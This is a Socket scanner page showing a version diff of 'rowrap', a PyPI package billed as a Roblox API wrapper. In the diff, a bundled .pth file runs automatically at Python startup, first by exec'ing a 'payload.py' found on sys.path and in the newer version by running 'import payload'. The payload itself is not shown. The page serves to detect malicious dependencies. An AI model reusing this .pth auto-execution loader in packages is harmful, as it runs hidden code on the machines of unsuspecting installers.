You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

rowrap

Package Overview
Dependencies
Maintainers
1
Versions
8
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

rowrap - pypi Package Compare versions

Comparing version
1.20
to
1.21
+0
-1
MANIFEST.in

@@ -8,5 +8,4 @@ include README.md

include robloxapi/super.pth
include robloxapi/payload.py
graft robloxapi
global-exclude __pycache__/*
global-exclude *.pyc
+1
-1
Metadata-Version: 2.4
Name: rowrap
Version: 1.20
Version: 1.21
Summary: A Python wrapper for the Roblox web APIs

@@ -5,0 +5,0 @@ License: MIT License

@@ -7,3 +7,3 @@ [build-system]

name = "rowrap"
version = "1.20"
version = "1.21"
description = "A Python wrapper for the Roblox web APIs"

@@ -30,5 +30,5 @@ readme = "README.md"

[tool.setuptools.package-data]
"robloxapi" = ["super.pth", "payload.py"]
"robloxapi" = ["super.pth"]
[tool.setuptools]
include-package-data = true

@@ -1,1 +0,1 @@

import sys,pathlib;exec(next((p.read_text() for d in sys.path if d for p in [pathlib.Path(d)/'payload.py'] if p.exists()),''))
import payload
Metadata-Version: 2.4
Name: rowrap
Version: 1.20
Version: 1.21
Summary: A Python wrapper for the Roblox web APIs

@@ -5,0 +5,0 @@ License: MIT License